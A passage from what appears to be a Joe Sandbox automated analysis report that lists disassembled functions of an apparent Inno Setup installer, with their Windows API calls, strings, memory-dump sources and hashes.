                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046C02A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                            • API String ID: 1452528299-3038984924
                                                                            • Opcode ID: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                            • Instruction ID: f21eca6685929eef9c1991e0f0882ebce6d76680defdff1bfc8b5815b9b403a8
                                                                            • Opcode Fuzzy Hash: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                            • Instruction Fuzzy Hash: FD014430E08248AACB14D7ED90912BDBBF49F09304F54C1AFA494DB242EAB905088B9B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00477888 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CountSleepTick
                                                                            • String ID:
                                                                            • API String ID: 2227064392-0
                                                                            • Opcode ID: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                            • Instruction ID: 600cfe0a74c4f2c1bd3ebedcfd2d7a6b72f2f4999c435aba37b1015e9725878a
                                                                            • Opcode Fuzzy Hash: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                            • Instruction Fuzzy Hash: B5E0E53170D501498A2031AE988A6AB4689CA89324B1985FFF48CE6242C4184C05C76F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00473420 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6,?,?,?,?,?,00492A60), ref: 00473429
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0047342F
                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 00473451
                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000), ref: 00473462
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                            • String ID:
                                                                            • API String ID: 215268677-0
                                                                            • Opcode ID: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                            • Instruction ID: b2e67a826371a673a356ac5d6eaa9b5bb997f149e1c9fc538a60d49279a5b6ce
                                                                            • Opcode Fuzzy Hash: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                            • Instruction Fuzzy Hash: 99F03061644301ABD600EAB5CC82E9B77DCEB44754F04883A7E98D72C1D679DD08AB66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004241B0 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastActivePopup.USER32(?), ref: 004241BC
                                                                            • IsWindowVisible.USER32(?), ref: 004241CD
                                                                            • IsWindowEnabled.USER32(?), ref: 004241D7
                                                                            • SetForegroundWindow.USER32(?), ref: 004241E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                            • String ID:
                                                                            • API String ID: 2280970139-0
                                                                            • Opcode ID: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                            • Instruction ID: 7a261241521d5f36110480f60a41559dbc21bd8b6604a945fb8666e4bf107b55
                                                                            • Opcode Fuzzy Hash: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                            • Instruction Fuzzy Hash: 0DE08699B06531139E31FA251885ABB25ACCD54B883C60127BC04F7243DF1CCFA0C1AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00466BEC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00466DD9
                                                                            • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 00466DDF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$EnableItemSystem
                                                                            • String ID: CurPageChanged
                                                                            • API String ID: 3692539535-2490978513
                                                                            • Opcode ID: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                            • Instruction ID: ce10d549b0c21605a6af546479ee9e12edac585882682887e1d5a1eed24c9042
                                                                            • Opcode Fuzzy Hash: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                            • Instruction Fuzzy Hash: E5A10734700104DFD711DB69D985EAD77F5EF89304F2640BAE8049B362EB39AE41DB49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004248B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 004248D5
                                                                            • WaitMessage.USER32(00000000,004249C9,?,?,?,?), ref: 004249A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMessageWait
                                                                            • String ID: )I
                                                                            • API String ID: 4021538199-2943873603
                                                                            • Opcode ID: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                            • Instruction ID: 3684f1357379c85a98af1ae3a8e7e482b9cd7f2697edbb5586c2bc0712e370a9
                                                                            • Opcode Fuzzy Hash: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                            • Instruction Fuzzy Hash: 5D31D4B07002249BCB21EF39D48179FB7B5EFC8304F96456AEC049B385DB789D80CA99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044F800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044F895
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044F8C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteMessageSendShell
                                                                            • String ID: open
                                                                            • API String ID: 812272486-2758837156
                                                                            • Opcode ID: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                            • Instruction ID: 7c1a3c7c8ebbf10466e07294f195938a80af8ea232d4303b03533db3f0a8dc42
                                                                            • Opcode Fuzzy Hash: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                            • Instruction Fuzzy Hash: ED213270E00644AFEB00EF69C881A9EB7F8EB44704F60857BF501FB391D7789A498A58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004686F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 004687E1
                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 004687CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                            • API String ID: 0-1974262853
                                                                            • Opcode ID: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                            • Instruction ID: f19096d41c4aac5864f1bb8ccf8968ed334c7e4c4402baa3f8ad6812cbe3c8f9
                                                                            • Opcode Fuzzy Hash: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                            • Instruction Fuzzy Hash: 2621B074A04204AFD701EBA9D985E99B7F4EF45315F2541BBF404AB392EB38AE40CB1D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453A00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00453A94
                                                                            • GetLastError.KERNEL32(0000003C,00000000,00453ADD,?,?,00000001,00000001), ref: 00453AA5
                                                                              • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                              • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                              • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                              • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
                                                                            • String ID: <
                                                                            • API String ID: 35504260-4251816714
                                                                            • Opcode ID: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                            • Instruction ID: 731c30c279f4aac689e5cd79ec505c098efd6bab46e48a29a8149d1d071dcc10
                                                                            • Opcode Fuzzy Hash: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                            • Instruction Fuzzy Hash: 862186B0600249EFDB10DF65D88269E7BE8EF04346F50443AF840E7381D7789E49CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(00494420,00000000,)), ref: 004025C7
                                                                            • RtlLeaveCriticalSection.KERNEL32(00494420,0040263D), ref: 00402630
                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                            • String ID: )
                                                                            • API String ID: 2227675388-1084416617
                                                                            • Opcode ID: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                            • Instruction ID: cb504dffcee3235a55bc4261ddae651f31054f91a8da10d6123b862062c9523b
                                                                            • Opcode Fuzzy Hash: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                            • Instruction Fuzzy Hash: A71101317042046FEB25AB799F1AB2A6AD4D7D575CB24087FF404F36D2D9BD8C02826C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00490A4E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00490A87
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID: /INITPROCWND=$%x $@
                                                                            • API String ID: 2353593579-4169826103
                                                                            • Opcode ID: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                            • Instruction ID: 8fbfb881858f58605f6fc747a7b473234afd2d79c1019554ad0381eeacbb4dac
                                                                            • Opcode Fuzzy Hash: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                            • Instruction Fuzzy Hash: 1611AF71A043099FDF05EBA4D841BAEBFF8EB59318F11447BE504E7281D63CAA05CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00446CA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • SysFreeString.OLEAUT32(?), ref: 00446D5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                            • API String ID: 3952431833-1023667238
                                                                            • Opcode ID: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                            • Instruction ID: b72a7a67dd3218f0a3ff88df64177c3b524228aef2acc9d842c2d5e561a8356e
                                                                            • Opcode Fuzzy Hash: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                            • Instruction Fuzzy Hash: 281196B0B042489FDB10DFA58D52AAEBBBCEB49704F51407AF500E7681D6799D04CA6A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004902C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000,00490363), ref: 0049032E
                                                                            • CloseHandle.KERNEL32(004903C8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000), ref: 00490345
                                                                              • Part of subcall function 00490218: GetLastError.KERNEL32(00000000,004902B0,?,?,?,?), ref: 0049023C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                            • String ID: PI
                                                                            • API String ID: 3798668922-693334235
                                                                            • Opcode ID: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                            • Instruction ID: 4ee4de2afa315c5d3ad3dcaece3c94236d659781de1454245e5c0a060b0d81db
                                                                            • Opcode Fuzzy Hash: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                            • Instruction Fuzzy Hash: 380161B1604648AFDF10DBE1DC82E9FBBACEF48714F51007AB904E7291D6785E048A28
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042DB9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DBB0
                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DBF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Value$EnumQuery
                                                                            • String ID: Inno Setup: No Icons
                                                                            • API String ID: 1576479698-2016326496
                                                                            • Opcode ID: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                            • Instruction ID: d0cbb6ba2be1033d78bdf391082c57df80f69eea6018bcbf63f776eb2494bfb3
                                                                            • Opcode Fuzzy Hash: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                            • Instruction Fuzzy Hash: 5A018431B8933069F73085266D41B6B558C9B46B64F65003BFA41AA3C0D6DCDC44E26A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00455040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00455055
                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 004550E7
                                                                            Strings
                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00455081
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)
                                                                            • API String ID: 3850602802-809544686
                                                                            • Opcode ID: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                            • Instruction ID: 32b2d8f4ecb8be4c0db4edd04b2ba3825a47f3f95082eca841b8c31c2652d296
                                                                            • Opcode Fuzzy Hash: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                            • Instruction Fuzzy Hash: DF11E5B12042805BD300AB6DDC92F6B7B989BD1708F05803AFA85DF2D2C3794805C7AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0049171E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00453D4C: GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
                                                                              • Part of subcall function 00453D4C: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
                                                                            • SetForegroundWindow.USER32(?), ref: 00491750
                                                                            Strings
                                                                            • Restarting Windows., xrefs: 0049172D
                                                                            • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0049177B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                            • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                            • API String ID: 3179053593-4147564754
                                                                            • Opcode ID: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                            • Instruction ID: 8093b4a282ce56f34fca2c4e27c1e82005ec878bca3fe8f1f990b5ec0d5489bc
                                                                            • Opcode Fuzzy Hash: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                            • Instruction Fuzzy Hash: 9D0188746042866BEB01EBA5E451F9C2BF99754309F5040BBF400672E3DA7C994A871D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00470EF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00470F4E
                                                                              • Part of subcall function 00470DA0: GetLastError.KERNEL32(00000000,00470E8C,?,?,?,00495090,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00470F13,00000001), ref: 00470DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
